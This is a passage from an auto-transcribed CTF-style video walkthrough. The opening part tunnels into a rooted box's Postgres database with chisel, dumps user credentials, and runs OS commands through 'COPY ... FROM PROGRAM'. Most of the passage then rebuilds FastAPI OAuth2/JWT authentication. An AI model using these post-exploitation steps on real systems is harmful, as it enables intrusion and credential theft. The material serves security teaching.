again and it looks like we have a connection so I can see the proxy was connected and the reason why I want to listen on this port is because later in the video or maybe earlier in the video for you guys I want to use this tunnel and play with um the actual fast API server locally and I don't want to stand up postgres on my local box so at some point in this video we use this connection to host the web server at least that's my plan so let's start up psql we can connect to it let's see let's do dash dash help and we want to do psql Dash h uh this will be oh anybody do localhost now and we screwed up this we don't point it to 127.001 we want to go to 172 2201 foreign like that there we go and now we're in the database so what we did here is um this is a reverse shell and by default it's going to map to 127.001 on this end and this end is my local box so I bet if I go to this we do SS lntp grep 5432 um I guess it's 0.0.0 by default which that is probably bad right so I guess when you run chisel and you do this um bind it to localhost so now this is the port we open locally and then anything that connects on this local Port we send it to this guy so now if I do this SSL and TP we're not listening on all IPS we're listening on 127. so now we can enumerate postgres and the syntax is really weird um backslash L is like list databases I think um Or List server info nope there we go list uh databases and we can see this um database exists we already connected to it with our um postgres like URL thing that we connected to so that doesn't matter we can do backslash DT this is going to be like describe tables and I did not do this I guess this is an artifact from testing um if you ever see this table it is pretty bad because it means someone probably hacked you um so we'll go into that after we do this we see the users table we can do backslash D Plus on users and we see ID email username password so the D plus is like describe in my sequel right so we wanted username password and email so before I do select Star right from users and this is how we can get all the credentials um I'm actually kind of curious select star from CMD exec we can see they ran the ID command it looks like um so if we wanted to we can say drop table if exists CMD exact to delete it so if someone hadn't ran command execution we would do a create table and then CMD exact you can name this anything you want right I'm going to give it CMD output as the table name so now if I do the backslash D Plus on CMD exec we can see it has one table uh column uh CMD output so now we can copy CMD exec from and then postgres has this program thing and we can say we already did the ID Command right so let's do hostname and I copied one and we can do a select star from CMD exec and we see the host name is this which is the docker container name this is only if you're a privileged user you can run backslash du and we see the postgres user is a super user so that's why we can do it um we could also like ipaddr uh command not found we do ID select star and we can see the two commands ran so that's the first name this is the ID command we could get a reverse shell as well but this is oh there's 28 lines here so that LS you can see um that so this is how you execute command on postgres so Hoopa this piece has helped you and let's continue on with the video so earlier in the video I talked about my dislike for not having all the locks next to each of these individual endpoints showing it's an authenticated one uh mainly because like this thing didn't work as you would expect in the Swagger also it's just nice to have visuals so you know what's authenticated or not so let's go and fix this app up to see exactly how it works the very first thing we have to do is get our development environment working and I do have a active um chisel currently and we did this earlier in the video where we set up a chisel to forward the postgres port to my local box so I don't have to worry about setting up the database or anything because I'm going to use the um quote-unquote production database but I do have to get the code on my box to a place where I can actually work with it so let us go on the box after we rooted it and I can do a Docker PS Because the actual web app is in this Docker API container it may exist on the server somewhere I don't know where it is so I'm going to access it from Docker so I do Docker exec Dash it this is going to be like interactive terminal I think it stands for um it may not be but that's how I remember it and then I'm going to start inputting the container ID I want which is 2 9 AF and we have to say sh to execute shell on it so now I'm on the container I'm going to go up one directory uh make sure tar is on the box and then we'll create an archive app.tar.bz2 and put this in it right we may want to exclude Pi C files just because we don't need them it automatically would create it but the container itself is small so that doesn't matter if I do it osla um it looks like they already had a backup once but we have ours currently so now I can do a Docker CP command so I'll do Docker CP for copy and then 29af and then we want app.tar.bz2 and I'll copy that to Dev shm so if I go in Dev shm we have app.tar.bz2 I can do it xjvf on it and it extracts it but I meant to just copy it to my box so let's do Python 3 Dash M HTTP server uh it's in use let's just put it on Port 8001 then we could W get 10 10 11 193. 8001 app.tar.bz2 Tara xjvf extract it and then we can go in and just run codium and now if we go to main press F5 to start the program let's see what happens no module named app so let's see I'm in the app directory and is trying to import itself we could try fixing up all these Imports but um I hate messing with the code so I'm going to go here new file I'm going to call this um that do what I expected if I save it okay um run dot Pi I'll call it there we go and what we want to do is copy this uvi corn command into python so let's see I need to import uvi corn then we can um from app we're going here so we're going in this directory and we'll do app.main import app so we go in the directory go in Main and import this which is going to start at and let's see if name is equal to Main uvi corn dot run we do app and then host is equal to zeros and Port is equal to we'll start on 9001. so I think that's going to work uh save the changes F5 to run this file I'm expecting to see like a fast API thing I don't know what it's doing let's see maybe we do from App import Main that doesn't look right and I just realized what it is um it's probably hanging on the database because it's trying to connect to 172. so let's edit the database to point it to localhost and I'm going to do app.main import app again because I think that's how we do it run it and let's see does it talk to the database now magically um no see if I set a breakpoint here do we hit it we did not hit that break point see did I do this wrong okay so I did the if name equals main thing wrong so I just want to check one thing let's just print name to see exactly what this is I'll set a break point there underscore main okay that was it that's what I want the simple things and I still have that commented out run it and there we go we have uvi corn running on localhost 9001 so if I go localhost 9001 we hit the page we can go to slash Docs and if I try this let's do on git users just make sure this is working as intended so let's see users get if I just set a break point here hopefully when I request this uh unprossable um it may be because the dependency did not even hit let's do it on add a user because this one is not required to log in I think right get used about ID let's see auth it would be here sign up there we go so there's no if we looked at users um we see this dependency and this is requiring them to be logged in but if I go to auth there's no dependency there so I can set a break point here and test if we have it for sign up so try out execute and we broke so we have confirmed our IDE is set up correctly right and I bet if I look at user schema here we can see all the variables it is if we go click here we could navigate the variables as well so now the next step is to stop the server we can clear our breakpoints that we set and we'll start with um fixing the Authentication and majority of this is going to come from the Swagger documentation so if I just go over to Google and I Google like Fast API put lock on Swagger see what happens we go to this first steps page and Let's see we have the lock right there so it's telling us what we have to do and essentially we just had to use this oauth password to bear and put it on a form but this gives us an authorization button so we can log in in Swagger and also tells us which endpoints require authentication so it's going to be a little bit messy going to the app and doing it but let's take a stab at this and um I'd probably create like a auth.pi file above the API to do most of these variables but um for the sake of quickness it's not going to be great code so the first thing we have to do is create the um oauth2 scheme right like this thing and this token URL is going to be where things go to log in and the application goes to slash auth login so that's why I'm going to put it there we'll also have to import this Library so we can just import it and then how we use this is um in the function like read items we're gonna do it on get users we just put this here right so I can copy the string and let's go to get users and I'm going to put it there and let's see I think I can do something like this just to make it a bit easier to read so now that the tokens is here it should have a lock on the git users page as long as everything is correct which it probably isn't but we'll cross that bridge when we get there so application has started up let's go to localhost 9001 we have an authorized button now and we do have a lock right and if I click the lock it wants us to log in so we have this auth login and we give a username and password so let's make sure we create a user so I'm going to create root at ipsec dot rocks username is going to be ipsec password of password so if we execute this let's see internal server error uh Missing field a validation huh let's see if it created the user real quick so let's try it out root ipsec dot rocks ipsec and the password of password I think we said okay so the users created it just aired on returning data probably I noticed that a lot with like pedantic things I'm guessing um like the actual create user returned based upon this it was expecting to see a password and some pedantic thing and it did not have the password we can see pedantic errors wrapper one validation for user DB so if we really wanted to we could set a breakpoint and look at it I guess now that I said it we have to do it right so let's go to auth and test my theory um so the response model is user DB so I'm guessing there's something in this user DB that either existed would oh um remember when we edited the uh user DB to add password it looks like we broke user registration so I added this field so we could export the passwords easily so now let's set a breakpoint like I said and we can go back to the browser and sign up I'll do root 2 ipsec to execute we break here if I do res we can see we only have these three Fields email ID and username but the user DB response model is expecting four Fields so that's why it failed um if we got rid of this and then we redo it so let's go back to run start it up and I guess we can do root three execute if I look at res now it is the same thing but user DB isn't going to expect that extra thing and the response body is now user ID 8. so that was the issue um it was just something we had done but that is why I like ide's and setting breakpoints because you can see how quickly we can troubleshoot that so now we have the auth login if we do username ipsec password or password we get the JWT token back I'm going to copy this Middle address Echo dash n put this in base64-d we can see this is what the token looks like foreign if I go to the authorize field and we do ipsec password and click authorize we get an error message and if I look at the terminal unprossable entity and I'm going to guess it's a very similar thing we have this payload user schema that we're passing and it wants email username and everything it also wants it in JWT format like Json if I send this to brip Suite let's go here burp Suite where is burp proxy on authorize we see it's not a valid dictionary and again it wants it like JWT format and then if we did this I'm going to guess it's going to still want the email because we specify email as a field in pedantic right so did I do this correctly is the thing ballot is not a dick where is encoding um is it just application Json now it wants email so if we did email root at ipsac.rox like that uh we need a comma here we get returned so what we want to do is convert this form in order to allow just form data and confirm with the um oauth 2 standard so I'm going to stop the web server I'm going to go into auth and let's see we no longer want a pedantic here um so what I'm going to do is let's see we can just do payload is equal to and then oauth 2 password request form is equal to I think depends like that and then we'll have to import this let's see is that on this page there I'm gonna guess it's just in fastapi.security so fast API dot security import uh let's do this save it and let's see where this errors now so if I go run python file does it start up pass the sniff test so let us intercept another login request because that one is all jacked up there we go so we're getting not authorized so something isn't working right off the bat if I look here we're getting forbidden when we hit auth login so again let's just step through this so if I send this if I look at what payload is let's go to debug console do payload and we have password and username here so this looks good so let's step into the login function and looking at this we have a field that we did not account for it wants the email so if I do payload.email there's no attribute so it's erroring here right if we step exception as e if I look at the exception see e um who all to password request form has no attribute email so that is the issue I'm just going to kill off searching for email and that's probably going to create other vulnerabilities in this application because I think you can have duplicate usernames maybe not duplicate emails or maybe it's not duplicate Booth um but now we have this so when I run this let's try logging in again and seeing what we get so it started we send it and we're going to hit this and let's look at what its success is so I'm just going to type success and hey it's um not none so we have something here so now we're going to return or create JWT and I just want to see what this is so I'm going to copy this command run it here and let's see so it's going to error here because um we did payload here and payload has no attribute email and if we remember um email is in the JWT so what we could do is if we looked at the login it was returning this whole row right so if we look at success let's see do we see it easily here row um let's see if I go success is it special variables I don't know a good way to view this but I know SQL Alchemy so if success and then what you Fields were in this um table so success username is ipsec Success email is that um is password even in here the password hashes as well so the success is because we went to login and the database fetch one query so we have the results of that query labeled as success so what that allows me to do is replace payload username with success so let's stop this and do success and then these are horrible names we probably should be renaming all these names but again just showing how I would go about this right uh we can leave this here um shoot I don't want to run there I want to go to run.pi run it wait for this to start up hit send and now we can step over that we have success and if I copy this debug we have created the JWT which is great so now run if I go back to my browser let's see I can turn burp Suite intercept off we can take this debug off it says we are logged in so this is successfully logged Us in and now when we try this out let's put something junky in there intercept execute uh shoot uh we should have the bearer token here it says undefined so how we returned um this data fast API did not like so if I go back to login we probably want to return a dictionary and the first field is access token because that's what this is and then we want to tell fast API what the token type is and the main reason I know this is because I've done way too much work with fast API I think that's how I do it let's run this again stop the server run if I go to the repeater tab send it we can see how this is sending right it was before just the string now we have this data so authorize let's log out and redo this flow so username ipsack password we click authorize we're logged in and now I'm going to turn intercept on we click execute here on the field that has the lock and we no longer have undefined we have the authorization header how it should be that being said um we have to update this field in order to do the processing the token correctly so the first step is to figure out exactly what aired looking at the code we got invalid valid header padding I'm guessing um it's been a while since I looked at this but the is log function I don't think is accounting for the word Bearer in play so I think that's why it's breaking on the JWT so I'm going to copy this is logged function and we're going to redo this so let's just send it and we get here and let's see authorization so I'm going to put this in and we see authorization space Bearer space something so if I go in this verify JWT function um I'm guessing let's see payload jwt.d code so if we look at token now it is that and if I attempt to decode this we have invalid padding but again um I'm almost positive it's because of Bear right so if we do token dot split and grab one there we go so I'm just going to do token is equal to that so now we got rid of the word token and if I do this JWT again it works so that is the issue but this issue is pretty big stemmed because I don't like how it does this all together so I would take out these dependencies here and what I want to do is not have this to be token I want this to be the user variable so I'm going to do current user here and instead of this depends oauth 2 scheme I'm going to create a new function in utils that Returns the user object and that will do the parsing of the JWT and then down here you could say like if user is admin right instead of putting it all up and the responses not sure if that's the correct way but I think this will be cool and a fun demo so let's see we need to go in utils and this is the verified JWT I'm just going to call this one uh parse token let's see copy put some spaces parse the token okay call it parse token like that and then we have to make this async and we can do token string equals depends oauth to scheme and we probably have to import that so let's go back to users what was this we can copy and paste see or2 password Bearer we probably need this Library as well and this should all be just in one file like I should not have this ol2 scheme stuff in here and once we do this we can probably remove it because we're moving over to utils so let's go back to parse token so now we're taking in the string and this we want to return a pedantic object and if we look here we have models import user schema so if I do userschema Dot I think user DB or something let's see what is user schema okay this is fine um no we don't want password we want user DB um actually I'm going to create we'll use userdb now if I was doing this for an actual app I'd probably have a different one and also put the group in so this group could be is admin but I don't remember the postgres structure right now so we can just do user DB that'll be fine let's see verify JWT parse token so we can just say this and up here we can import that so we have it and now we have this piece so the first thing I want to do I'm going to create the credential exception I'm just copying this from another project I have all it does is sets this and we can return this if we error out um so if we can't parse the token that's what we're going to do so let's see try I don't know why we declare this as secret but okay and then the token I think that may be fine because I think how we're parsing this I think it'll grab bear if I remember correctly so Secret okay and then what we want to return is not true we want to return payload I believe because that would be what the JWT is and then except we can just return or because this is an um async we don't return we do a raise so raise credential exception because we're unauthorized let's see I think this is how I do it and the exception it'll probably just be JWT error I'm curious how this works so let's just see if this application starts and if it does start if um it even works so parse token is here we can add first token uh this should be not a string I would guess like that and I will break here because if everything works we'll have a user there but I don't think we do tell me where my code fails okay depends is not defined so that was defined here where is depend fast API we can just import it there we go let's see where I fail okay let's see invalid args for response field depends parse token is a valid pedantic feel tight I'm guessing since the code was previously like this um we just have to put the user DB field here to tell it this is how we parse it let's see what happens and this is pretty much how software development goes at least for me we just fell away to Victory I mean it's also how pen testing works right we just keep failing and failing and failing eventually it works so name status is undefined utils.pi line 49. so utils 49 uh we have to import something here uh let's see status I'm guessing yes status is not defined so let's see look at our Imports and let's just add status here because that should be a fast API thing run it we start up send this and we get all the way to our git user endpoint so now the moment of truth is what does current user look like we have current user is the variable here so this is looking great we can return and if we look at what came back in burp Suite where'd you go bro there you are we have a list of all our users so everything seems to be working better the only thing that we haven't done is before this required us being admin and we don't have an admin field here so do I still have a postgres connection up I do let's see it was like slash D plus users right to describe this user's table and we don't have groups here so the issue we're running into right now is um we don't have an admin field and slash DT there's no groups table so how this application was doing admin before is let's see if we go to is admin um it's just checking if the username is a string so there's no information in Paris grass do this easily which makes it painful for us um in a perfect world we could go back to our utils and where press token is where we return let's see is this where we return the token no we return the token on let's see let's go through the field so if we go to auth we have this as crud login payload and this returns something success username thank you so the create JWT here we should be able to pull the group right so um I don't know a good way to show this because we don't have groups in the database let's see where is parse token is admin authorization string header yeah this is a mess um okay let's just say payload is equal to this we can say if username is equal to ipsec then is admin equal true like that and before this we can say is admin is equal to false so again we're hard coding the admin check but this payload Now can do admin and is admin like this so when we return the token or return if we're an admin or not and now since we did that we got to look at where this was used which let's see it was the user DB right so this will be Capital user and let's go back into models whoops and I'm just going to do user user DB okay I think this works so um actually this was is admin so what I did here is I created a new class and since I did user DB here I think it's going to take all the base things of this and then also add is admin um I want to say that's how it works we'll find out so let's go back here let's see utils foreign user so now we also have to import this did I already do that I did not and it may be a goaling habit for me but whenever I like export something between different name spaces um Girling does things if it's first letter capital is global so if you're wondering why I decided to randomly capitalize that that is why so that is good if we go to users now we're no longer user DB or user and we want to import that and let's see if this works I don't think it will I know I forgot something so let's log in oh my God let's see Echo base64-d hey admin is equal to true so we've already put that in our thing so it worked first try that is actually amazing right and we have a break point on this get users thing right so if I um let's see go back here is this to get users here and if I do my current user now it does not say admin which is bad because the whole idea is I should be able to parse this and get that where did you drop admin let's go to parse token Let's see we return user JWT D code oh because I didn't re-log into the application that's why so I bet if I went to this was this or this it was definitely this one and we copy the new access token and we paste it this will probably now work as we expect foreign we break now I'm going to look at current user Echo dash n b64-d so that did not have what I expected let's just log in again so I'm going to stop run and then let us authorize log out ipsec password authorized to log in let's go to prep Suite turn intercept off you can return that sure so now we're logged in I probably should refresh this page because we changed it you'll notice there's no parameters here because it's coded to take it from the token right if I execute this we get not authenticated so let's authorize ipsec password okay now I'm going to click execute again it returns here let's look at what current user is hey we have admin is equal to true so that is all working go back to the page and we've dumped everything right so Let's Pretend the database um requires let's let me finish my train of thought real quick so we go here where do we do it okay so in the create JWT if the database column was saying ipsex not an admin so I'm going to say if username is ipsec2 or would do please subscribe which we are not so I save this we restart okay I click execute we're here current user um we need to re-log in because we got our JWT and this is one of the reasons why you don't put group information in jwts because they're valid until they're not right so now I got my new JWT uh we screwed something up ipsec password authorize I don't know what we screwed up well it's not running that is the first issue start it okay refresh authorize ipsack password so that was probably issue I just wasn't running so we execute this and I look current user admin is equal to false so what I could do is say let's see if current user admin return that and then what is the default thing whoops status let's just add this let's see let's just do this and return credentials exception fast API status let's just see how this looks so now I'm running execute internal server error one validation what we hit this so current user let's see what this looks like is it a DOT no oh we need to return a weight no we don't let's just get rid of the exception piece videos getting along let's just wrap it up right so if I return nothing what happens internal server error oh um the issue is is expecting list user DB so it's expecting to return um this model right so because it's expecting this um it's erroring out because blank string does not validate this pedantic object so if we look at what crud git users is um it's returning something in pedantic but I think that'll be it for the video um you get most the point uh if we make ourselves admin it'll return everything again so we can prove that and then wrap up so let's see do we have ipsec 2 as a user or we can just make ourselves admit again see where was it was it users no because what was you tell create JWT oh username please subscribe so now I set myself to admin let us log out log in to get a new JWT execute and we get a list of users so that'll be the video hope you guys enjoyed it take care and I will see you all next week
Info
Channel: IppSec
Views: 15,776
Rating: undefined out of 5
Keywords:
Id: MjddXhMF9vg
Channel Id: undefined
Length: 121min 59sec (7319 seconds)
Published: Sat Mar 11 2023
Related Videos
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.